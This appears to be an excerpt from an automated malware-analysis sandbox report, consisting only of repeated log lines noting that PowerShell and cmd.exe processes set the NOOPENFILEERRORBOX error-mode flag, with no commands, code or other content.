                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
